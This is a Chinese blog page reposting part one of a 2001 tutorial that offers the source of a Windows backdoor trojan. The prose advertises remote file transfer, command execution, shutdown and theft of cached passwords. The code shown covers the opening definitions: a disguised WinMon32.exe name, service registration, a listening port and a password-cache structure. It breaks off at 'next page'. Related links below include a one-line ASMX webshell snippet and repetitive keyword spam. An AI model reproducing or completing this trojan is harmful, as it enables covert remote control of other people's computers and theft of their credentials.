`
yesjavame
  • 浏览: 679534 次
  • 性别: Icon_minigender_2
  • 来自: 杭州
文章分类
社区版块
存档分类
最新评论

一个简单木马列子(1)

阅读更多
一个简单木马列子(1)

[ 作者: 病毒 添加时间: 2001-5-21 下午 06:12:02 ]


来源:绿色兵团

俺写文章一般都赋源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样
才比较实际,关于那些函数用法和功能大可以去翻书,哪里讲的比谁都详细.

这里给了一个俺用异步SOCKET方式, 直接调用WINSOCK API,WIN SDK写的木马(VC,C++ BUILDER下均编译,调试通过),无须客户端,编译后才几十K.实现了些 主要功能,文件浏览,上传,下载(均支持统配符),改变目录,获取系统信息,从CACHE取密码, 执行文件,显示进程, 发送消息,关机, 还有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考虑到如CMD.EXE已改名或不存在,那么程序 将毫无用处. 所以 并没有调用CMD.EXE来完成,全部由自己来做,WIN API实现.要想自己程序通用就不要怕 麻烦.建议那些用现成控件写木马和网络通讯的朋友应该看看,去熟悉这些根本所在, 尤其是在网络 通讯方面.如果你是个程序员 我想大可不必用我多说,在开发中俺还没见过哪家公司让 用现成类 (MFC,VCL)来做的.

此程序还不很健壮,写完后也没来的及优化,主要是拿来让大家熟悉一下WINSOCK和WIN SDK编程.


//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK编程,无需客户端
//
// 作者: 贾佳
//---------------------------------------------------------------------------

#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#pragma hdrstop
#include <condefs.h>
#pragma argsused

#define RUN "\\WinMon32.exe"

//注册服务
#define SERVICE_PROC 1
//卸载服务
#define UNSERVICE_PROC 0

#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255

//缓冲区长度
#define dwBuffSize 2048
//命令行长度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan:\\>"

DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;

//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;


<!--prevpage-->下一页 8

分享到:
评论

相关推荐

    探索基于.NET下实现一句话木马之asmx篇1

    一个ASMX服务由一个或多个带有[WebMethod]属性的公共方法组成,这些方法能够被远程调用。例如: ```csharp [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.Basic...

    一个特洛伊木马的发现和清除

    ### 一个特洛伊木马的发现和清除 #### 知识点概览 - 特洛伊木马的基本概念 - 发现特洛伊木马的方法 - 确认特洛伊木马的存在 - 清除特洛伊木马的步骤 - 防止特洛伊木马的技巧 #### 特洛伊木马的基本概念 特洛伊木马...

    木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫

    木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫...

    木马专杀工具-木马克星

    1. **木马扫描**:木马克星具备深度扫描功能,能深入系统各个角落,查找并识别隐藏的木马程序。它不仅可以扫描系统文件,还检查注册表项、启动项、网络连接等可能被木马利用的地方,确保全方位无死角的防护。 2. **...

    VC++开发的远程控制系统,有一个简单的木马后门

    在这个特定的案例中,我们讨论的是一个由VC++(Visual C++)开发的远程控制系统,它包含一个简单的木马后门功能。 首先,让我们深入了解一下VC++。VC++是微软开发的一款集成开发环境,主要用于编写使用C++语言的...

    木马常见植入技术大剖析

    早期的木马程序功能较为简单,通常是将一段恶意代码嵌入到系统文件中。随着技术的进步,木马程序变得更加复杂,例如: - **利用E-Mail**:攻击者将木马程序作为附件发送给受害者,一旦打开附件,木马便自动执行。 -...

    木马克星是一个功能很强的木马专杀工具

    因此,拥有一个像木马克星这样的专业木马查杀工具,对于个人和企业的网络安全至关重要。 二、木马克星的主要功能 1. 实时防护:木马克星提供实时监控功能,能即时检测并阻止木马病毒的入侵,保护系统免受感染。 2....

    一个不错的旋转木马轮播图特效.zip

    总结来说,"一个不错的旋转木马轮播图特效.zip"文件中包含的特效是基于CSS3的3D转换技术和前端JavaScript实现的。通过合理运用这些技术,我们可以创建出一个动态、立体的轮播图,不仅视觉效果出众,还能为网页增添...

    木马记---一本关于木马源头的故事

    在战争僵持不下的情况下,希腊将领奥德修斯设计了一项计策,制造了一个巨大的木马,里面藏匿了全副武装的希腊士兵。特洛伊人误以为希腊人撤退,将木马作为神的祭品带入城内,导致夜间希腊士兵出其不意地打开城门,使...

    木马与防范原理简单介绍

    在【压缩包子文件的文件名称列表】中,"20080824mmff"可能是一个日期加上随机字符的组合,这可能代表一个特定日期(2008年8月24日)创建或更新的文件,也可能是一个文件或文档的内部代码。如果这个文件包含关于木马...

    一句话图片木马讲解.rar

    1. "一句话图片木马讲解.exe":这是一个可执行文件,很可能是模拟或演示如何运作的一句话图片木马,用户应当谨慎处理,避免在未了解清楚之前直接运行,以防病毒感染。 2. "说明文本.txt":可能包含了详细的使用指南...

    木马克星(查杀木马病毒)

    "Iparmor"则可能是木马克星的一个组件或更新文件,用于增强防护能力。 总的来说,使用木马克星这样的专业工具是保障个人电脑安全的重要手段,用户应定期进行系统扫描,并保持软件的更新,以抵御不断变化的网络威胁...

    木马查杀工具 木马木马

    一个金山公司的木马查杀工具! 阿斯顿爱上大

    木马专杀工具木马专杀工具木马专杀工具木马专杀工具木马专杀工具木马专杀工具

    木马专杀工具是针对计算机系统中的一种恶意软件——木马病毒进行查杀的专业软件。木马,全称为“特洛伊木马”,源自古希腊神话中的特洛伊木马故事,寓意隐藏在正常程序中的恶意代码。在信息技术领域,木马通常伪装成...

    windows木马清理助手

    在IT安全领域,Windows操作系统因其广泛的用户基础,成为了木马病毒的重要目标。"Windows木马清理助手"是一款专为Windows用户设计的工具,...在日常使用中,用户需要结合良好的网络习惯,共同构建一个安全的数字环境。

    木马端口查看木马端口查看

    木马端口查看 木马端口查看是指通过各种命令或工具来查看当前计算机开放的端口...木马端口查看是计算机安全维护的一个重要步骤,需要我们时刻关注计算机开放的端口,并采取相应的防止措施,以保护计算机系统的安全性。

    Android-3D自动旋转的旋转木马

    1. **布局设计**:首先,在XML布局文件中,我们需要一个可以承载3D视图的容器,通常是一个自定义的`GLSurfaceView`,这将作为旋转木马的画布。 2. **模型创建**:每个“旋转木马上的马匹”(即要展示的元素)都是一...

    木马专杀。各种木马专杀

    木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀

    木马分离.zip

    3. 分离与清除:一旦识别出恶意代码,木马分离器会将其从文件中分离出来,形成一个无害的文件副本。对于无法完全分离的部分,可能会选择直接删除或阻止其执行。 三、"木马分离.exe"的应用 "木马分离.exe"是一款...

Global site tag (gtag.js) - Google Analytics